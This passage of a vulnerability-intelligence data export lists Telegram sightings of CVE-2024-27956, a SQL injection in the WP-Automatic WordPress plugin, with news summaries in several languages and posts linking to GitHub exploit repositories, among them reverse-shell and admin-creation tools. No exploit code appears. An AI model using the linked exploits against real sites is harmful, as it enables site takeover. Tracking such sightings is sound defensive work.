"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/4801", "content": "POC RELEASED\nPoC for #SQL injection leads to RCE in Wordpress released (CVE-2024-27956).\n\nHackers Factory\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-06-17T12:39:44.000000Z"}, {"uuid": "5f45dba4-bd67-4666-95a3-cf5e254fb31d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/1172", "content": "The Hacker News\nHackers Exploiting WP-Automatic Plugin Bug to Create Admin Accounts on WordPress Sites\n\nThreat actors are attempting to actively exploit a critical security flaw in the WP\u2011Automatic plugin for WordPress that could allow site takeovers.\nThe shortcoming, tracked as CVE-2024-27956, carries a CVSS score of 9.9 out of a maximum of 10. It impacts all versions of the plugin prior to 3.9.2.0.\n\"This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as", "creation_timestamp": "2024-04-26T11:41:47.000000Z"}, {"uuid": "c402e47d-18bd-4354-a25b-ddfa24c31ff1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/KomunitiSiber/1850", "content": "Hackers Exploiting WP-Automatic Plugin Bug to Create Admin Accounts on WordPress Sites\nhttps://thehackernews.com/2024/04/hackers-exploiting-wp-automatic-plugin.html\n\nThreat actors are attempting to actively exploit a critical security flaw in the WP\u2011Automatic plugin for WordPress that could allow site takeovers.\nThe shortcoming, tracked as\u00a0CVE-2024-27956, carries a CVSS score of 9.9 out of a maximum of 10. It impacts all versions of the plugin\u00a0prior to\u00a03.9.2.0.\n\"This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as", "creation_timestamp": "2024-04-26T09:03:37.000000Z"}, {"uuid": "6867170f-81b5-4646-a3c9-e4a1dca56dc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/pAhL0Y0-25WuKbTjtFnfR_Xs2-BuvkpahhgLLseEPoVFP08", "content": "", "creation_timestamp": "2025-04-28T05:00:06.000000Z"}, {"uuid": "5131f63a-859b-4c7f-94a1-648dc7b7eea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GhostPrincess/14769", "content": "POC RELEASED\nPoC for #SQL injection leads to RCE in Wordpress released (CVE-2024-27956).\n\nHackers Factory\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-06-17T12:20:47.000000Z"}, {"uuid": "9304ce61-970a-4b63-99ba-4e543e04618c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/Akhand_Aryavart/1271289", "content": "(cve-2024-27956) - WordPress Admin Account Creation and Reverse Shell \n\nWordPress Auto Admin Account Creation and Reverse Shell cve-2024-27956 automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries\n\nGithub\n\nhttps://t.me/pythagorez", "creation_timestamp": "2024-05-18T06:34:54.000000Z"}, {"uuid": "d9832c5f-b710-4039-8225-0f568e238a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8212", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "a825e6b3-1d79-4736-8cf2-a56ad0c1d3c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7980", "content": "POC RELEASED\nPoC for #SQL injection leads to RCE in Wordpress released (CVE-2024-27956).\n\nHackers Factory\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-06-17T12:20:33.000000Z"}, {"uuid": "48cd9962-3a67-46c6-9d1e-b6bf8ee3c687", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/leak_db2/1898", "content": "PoC for SQL Injection leads to RCE in Wordpress released (CVE-2024-27956)", "creation_timestamp": "2024-05-06T20:27:07.000000Z"}, {"uuid": "0a16591c-3368-404e-9544-099676d0731f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3405", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T11:05:42.000000Z"}, {"uuid": "b48577d7-9199-4673-84c1-cb8ec4dcf58e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3292", "content": "POC RELEASED\nPoC for #SQL injection leads to RCE in Wordpress released (CVE-2024-27956).\n\nHackers Factory\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-06-17T12:57:35.000000Z"}, {"uuid": "cc342609-e3f7-4a06-99d5-2cb0464fd095", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2079", "content": "cve-2024-27956\n*\nWordPress Auto Admin Account Creation and Reverse Shell.\n*\n\u0414\u044b\u0440\u043a\u0430 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 wp-automatic \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n#wordpress", "creation_timestamp": "2024-05-14T23:01:31.000000Z"}, {"uuid": "5d52dd3e-c774-477d-8a29-3681326998d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/8061", "content": "POC RELEASED\nPoC for #SQL injection leads to RCE in Wordpress released (CVE-2024-27956).\n\nHackers Factory\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-06-17T12:39:44.000000Z"}, {"uuid": "ccbb5a74-c2dd-4049-8a94-c95956488a10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/Gc1XHJyHAM5Pifcqvb3cxcWiyC051Kb7bw1lbriDtYRZVXU", "content": "", "creation_timestamp": "2024-06-21T06:54:05.000000Z"}, {"uuid": "9cdbb916-4c63-4a91-9a0b-7345f330a480", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6747", "content": "POC RELEASED\nPoC for #SQL injection leads to RCE in Wordpress released (CVE-2024-27956).\n\nHackers Factory\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-06-17T12:20:33.000000Z"}, {"uuid": "ed986260-1a95-4965-a0df-ac85b3a81d6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6918", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.\n\nPoC\nhttps://github.com/acrono/cve-2024-6387-poc\n\nCVE-2024-29849: Veeam Backup Enterprise Manager Authentication Bypass.\n\nPoC\nhttps://github.com/sinsinology/CVE-2024-29849\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-07-14T04:09:19.000000Z"}, {"uuid": "6229641f-d9e8-4443-8594-f2d324a08939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/MrVGunz/1118", "content": "\u26a0\ufe0f \u062a\u0648\u062c\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0648\u0631\u062f\u067e\u0631\u0633!\n\n\u06cc\u06a9 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062d\u06cc\u0627\u062a\u06cc SQL injection (CVE-2024-27956) \u062f\u0631 \u0627\u0641\u0632\u0648\u0646\u0647 WP-Automatic \u062f\u0631 \u062d\u0627\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0641\u0639\u0627\u0644 \u0627\u0633\u062a. \u0628\u0627 \u0634\u062f\u062a \u062d\u062f\u0627\u06a9\u062b\u0631\u06cc 9.9 \u0627\u0632 10\u060c \u0627\u06cc\u0646 \u0628\u0627\u06af \u0627\u0645\u06a9\u0627\u0646 \u062a\u0635\u0631\u0641 \u0648\u0628\u200c\u0633\u0627\u06cc\u062a \u0648 \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u062e\u0628\u06cc\u062b \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f.\n\u062c\u0632\u0626\u06cc\u0627\u062a: https://thehackernews.com/2024/04/hackers-exploiting-wp-automatic-plugin.html\n\u0627\u0633\u062a\u0641\u0627\u062f\u0647: https://github.com/diego-tella/CVE-2024-27956-RCE\n\n\ud83d\udea8 Attention WordPress users! \n \nA critical SQL injection vulnerability (CVE-2024-27956) in the WP-Automatic plugin is being actively exploited. With a max severity of 9.9/10, this bug enables site takeovers and malicious activities.\nDetails: https://thehackernews.com/2024/04/hackers-exploiting-wp-automatic-plugin.html\nExploit: https://github.com/diego-tella/CVE-2024-27956-RCE", "creation_timestamp": "2024-05-16T23:12:51.000000Z"}, {"uuid": "13f66ef9-1770-4d75-8832-d911f1ed1eb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://t.me/CyberSecurityIL/43564", "content": "\u05e9\u05ea\u05d9 \u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05e9\u05de\u05e0\u05d5\u05e6\u05dc\u05d5\u05ea \u05d1\u05e4\u05d5\u05e2\u05dc \u05e2\"\u05d9 \u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05d1\u05e2\u05d5\u05dc\u05dd \u05d5\u05db\u05d3\u05d0\u05d9 \u05dc\u05e9\u05d9\u05dd \u05d0\u05dc\u05d9\u05d4\u05df \u05dc\u05d1:\n\n- \u05d7\u05d5\u05dc\u05e9\u05d4 \u05d1\u05e9\u05e8\u05ea\u05d9 CrushFTP \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05d4\u05e8\u05e6\u05ea \u05e7\u05d5\u05d3 \u05de\u05e8\u05d7\u05d5\u05e7 - CVE-2024-4040 (\u05de\u05d1\u05d3\u05d9\u05e7\u05d4 \u05e7\u05e6\u05e8\u05d4 \u05d1\u05e9\u05d5\u05d3\u05d0\u05df \u05e0\u05e8\u05d0\u05d4 \u05e9\u05d9\u05e9 \u05db\u05de\u05d4 \u05e9\u05e8\u05ea\u05d9\u05dd \u05d1\u05d5\u05d3\u05d3\u05d9\u05dd \u05d1\u05d9\u05e9\u05e8\u05d0\u05dc)\n\n- \u05d7\u05d5\u05dc\u05e9\u05d4 SQLi \u05d1\u05e4\u05dc\u05d0\u05d2\u05d9\u05df WP Automatic \u05d4\u05de\u05e9\u05de\u05e9 \u05d0\u05ea\u05e8\u05d9\u05dd \u05d4\u05e2\u05d5\u05e9\u05d9\u05dd \u05e9\u05d9\u05de\u05d5\u05e9 \u05d1\u05e4\u05dc\u05d8\u05e4\u05d5\u05e8\u05de\u05ea \u05d5\u05d5\u05e8\u05d3\u05e4\u05e8\u05e1 - CVE-2024-27956. \u05d0\u05dd \u05d0\u05ea\u05dd \u05e2\u05d5\u05e9\u05d9\u05dd \u05e9\u05d9\u05de\u05d5\u05e9 \u05d1\u05e4\u05dc\u05d0\u05d2\u05d9\u05df \u05d0\u05d6 \u05ea\u05d6\u05d3\u05e8\u05d6\u05d5 \u05dc\u05e2\u05d3\u05db\u05df \u05dc\u05d2\u05e8\u05e1\u05d4 \u05d4\u05d0\u05d7\u05e8\u05d5\u05e0\u05d4.\n\nhttps://t.me/CyberSecurityIL/5052\n\n#\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea", "creation_timestamp": "2024-04-25T20:40:42.000000Z"}, {"uuid": "1b003f0b-e29e-44d2-a7a4-745a23762db9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/true_secator/5688", "content": "WPScan \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043d\u0430\u0447\u0430\u043b\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0448\u0438\u0431\u043a\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 WP-Automatic \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c\u043d\u044b\u0445 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0430\u0439\u0442\u043e\u0432 WordPress.\n\n\u041f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u043c\u0430\u044f \u043f\u0440\u0438 \u044d\u0442\u043e\u043c CVE-2024-27956 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 SQL-\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0435\u0439 (SQLi) \u0438 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 9,9 \u0438\u0437 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0445 10, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044f \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u043e 3.9.2.0.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u0430\u043c, \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0430, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u043d\u0430\u0434 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u043c\u0438 \u0441\u0430\u0439\u0442\u0430\u043c\u0438.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043b\u0430\u0433\u0438\u043d\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u043d\u043e \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0431\u043e\u0439\u0442\u0438, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n\u0412 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0445 \u043a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0430\u0442\u0430\u043a\u0430\u0445 CVE-2024-27956 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043a \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u0430\u0434\u043c\u0438\u043d\u0441\u043a\u0438\u0445 \u0443\u0447\u0435\u0442\u043e\u043a \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0430\u0439\u0442\u0430\u0445 WordPress, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0442\u0435\u043c \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u043e\u0432 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u043b\u0438 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043a\u043e\u0434\u0430.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u0437\u043b\u043e\u043c\u0430 \u0441\u0430\u0439\u0442\u0430 WordPress \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044e\u0442 \u043f\u0435\u0440\u0441\u0438\u0441\u0442\u0435\u043d\u0442\u043d\u043e\u0441\u0442\u044c, \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u044f \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u0438 \u0437\u0430\u043f\u0443\u0442\u044b\u0432\u0430\u044f \u043a\u043e\u0434. \n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0432\u0430\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0444\u0430\u0439\u043b WP\u2011Automatic (\u0441 /wp\u2011content/plugins/wp\u2011automatic/inc/csv.php \u043d\u0430 wp\u2011content/plugins/wp\u2011automatic/inc/csv65f82ab408b3.php), \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0430\u0442\u0430\u043a \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043b\u043b\u0435\u0433.\n\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u043a \u0431\u044b\u043b \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442 Patchstack 13 \u043c\u0430\u0440\u0442\u0430 2024 \u0433\u043e\u0434\u0430. \n\n\u0421 \u0442\u0435\u0445 \u043f\u043e\u0440 \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 5,5 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0430\u0442\u0430\u043a \u0441 \u0446\u0435\u043b\u044c\u044e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.", "creation_timestamp": "2024-04-27T14:50:05.000000Z"}, {"uuid": "34674cbe-5708-400c-b4ea-f883c843b2eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3655", "content": "https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956", "creation_timestamp": "2024-05-15T19:43:21.000000Z"}, {"uuid": "d4fea5b2-72e3-463c-a6dd-88d5c71ea02b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3656", "content": "https://github.com/truonghuuphuc/CVE-2024-27956", "creation_timestamp": "2024-07-04T13:40:01.000000Z"}, {"uuid": "e48f95af-a83e-4054-95f4-1cf041956440", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/thehackernews/4878", "content": "\ud83d\udea8 Attention WordPress users! \n \nA critical SQL injection vulnerability (CVE-2024-27956) in 